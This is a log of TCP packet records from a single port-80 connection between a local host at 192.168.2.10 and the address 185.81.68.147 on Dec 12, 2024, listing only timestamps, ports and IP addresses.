Dec 12, 2024 16:48:50.441370964 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.441437006 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.441757917 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.442393064 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.442440987 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.442574978 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.443464994 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.443471909 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.443710089 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.444403887 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.444648027 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.445166111 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.445492029 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.445535898 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.445981026 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.446439981 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.446515083 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.446518898 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.447463036 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.447551012 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.447947025 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.448484898 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.448565006 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.448762894 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.449528933 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.449758053 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.449815035 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.450530052 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.450536966 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.450593948 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.451622009 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.451628923 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.451687098 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.452532053 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.452636957 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.453556061 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.453562021 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.453589916 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.453651905 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.454561949 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.454634905 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.455375910 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.455631971 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.455636978 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.455703974 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.456602097 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.456815004 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.457102060 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.457616091 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.457902908 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.457914114 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.458777905 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.458785057 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.459392071 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.459687948 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.459775925 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.459935904 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.460666895 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.460946083 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.461678982 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.461747885 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.461802006 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.462718964 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.463318110 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.463387966 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.463709116 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.463901043 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.463928938 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.464746952 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.464929104 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.464989901 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.465815067 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.465821981 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.465888977 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.466878891 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.466983080 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.467601061 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.467865944 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.467926025 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.468452930 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.468911886 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.469796896 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.469881058 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.469891071 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.469898939 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.470189095 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.470887899 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.470957994 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.471393108 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.471853971 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.471860886 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.471926928 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.472853899 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.472976923 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.473072052 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.473790884 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.479434013 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.613121986 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.613137007 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.613645077 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.613670111 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.613862991 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.613964081 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.614022017 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.614871979 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.614919901 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.614947081 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.615652084 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.615808010 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.615870953 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.616713047 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.616903067 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.617528915 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.617599010 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.618657112 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.618664026 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.618669987 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.618735075 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.619626999 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.619950056 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.620702028 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.620717049 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.620728970 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.620771885 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.621654987 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.622524023 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.622653961 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.622668982 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.623130083 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.623392105 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.623733997 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.623740911 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.624686956 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.624767065 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.625199080 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.625788927 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.626182079 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.626449108 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.626795053 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.626801968 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.626976967 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.627793074 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.627891064 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.627964973 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.628757000 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.629471064 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.629596949 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.629776001 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.630116940 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.630224943 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.630819082 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.631705046 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.631865025 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.631874084 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.631881952 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.631936073 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.632863998 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.633373976 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.633477926 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.633997917 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.634008884 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.634196997 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.634901047 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.635394096 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.635536909 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.635942936 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.635992050 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.636118889 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.636934042 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.636943102 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.637058020 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.637953997 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.638055086 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.638978004 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.638989925 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.638998032 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.639053106 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.639939070 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.640021086 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.640090942 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.641006947 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.641599894 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.642102003 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.642110109 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.642138004 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.642184019 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.643011093 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.643827915 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.644002914 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.644064903 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.644130945 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.645062923 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.645070076 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.645241976 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.646229029 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.646320105 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.647294998 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.647301912 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.647341967 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.647372961 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.648287058 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.648401022 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.648633003 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.649413109 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.649693012 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.650111914 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.650727987 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.650851965 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.651144981 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.651837111 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.652024031 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.652066946 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.652996063 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.653131962 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.653517008 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.654079914 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.654087067 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.654175043 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.655031919 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.655109882 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.655255079 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.656109095 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.656158924 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.656750917 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.656932116 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.656991005 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.657048941 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.657885075 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.657934904 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.658009052 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.658848047 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.659068108 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.659686089 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.659693956 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.659722090 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.659744024 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.660482883 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.660559893 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.660588026 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.661588907 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.661955118 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.662458897 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.662467003 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.662522078 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.662543058 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.663336039 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.663407087 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.663484097 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.664279938 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.664323092 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.665313959 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.665321112 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.665328026 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.665378094 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.806654930 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.806741953 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.806845903 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.807065964 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.807254076 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.807337046 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.808084965 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.808191061 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.808327913 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.809230089 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.810100079 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.810113907 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.810153961 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.810208082 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.810412884 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.811120987 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.811132908 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.811192036 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.812146902 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.813162088 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.813174009 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.813210964 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.813211918 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.813421965 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.814225912 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.814240932 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.814296961 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.815190077 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.815325975 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.815376997 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.816239119 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.816945076 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.816993952 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.817157984 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.818245888 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.818258047 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.818280935 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.818312883 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.818346977 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.819272041 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.819937944 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.819991112 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.820245028 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.821253061 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.821295977 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.821310043 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.821315050 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.821369886 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.822463989 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.822700024 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.822781086 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.823359966 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.823373079 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.823426008 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.824311972 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.825330019 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.825340986 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.825372934 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.825382948 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.825536966 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.826342106 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.826575994 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.826647043 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.827357054 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.827507019 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.827564001 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.828351021 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.828700066 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.828883886 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.829394102 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.829716921 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.829792976 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.830400944 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.830647945 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.830694914 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.831666946 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.831732035 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.831787109 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.832420111 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.832658052 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.832719088 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.833457947 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.833559036 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.833611012 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.834458113 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.834582090 CET	80	49946	185.81.68.147	192.168.2.10
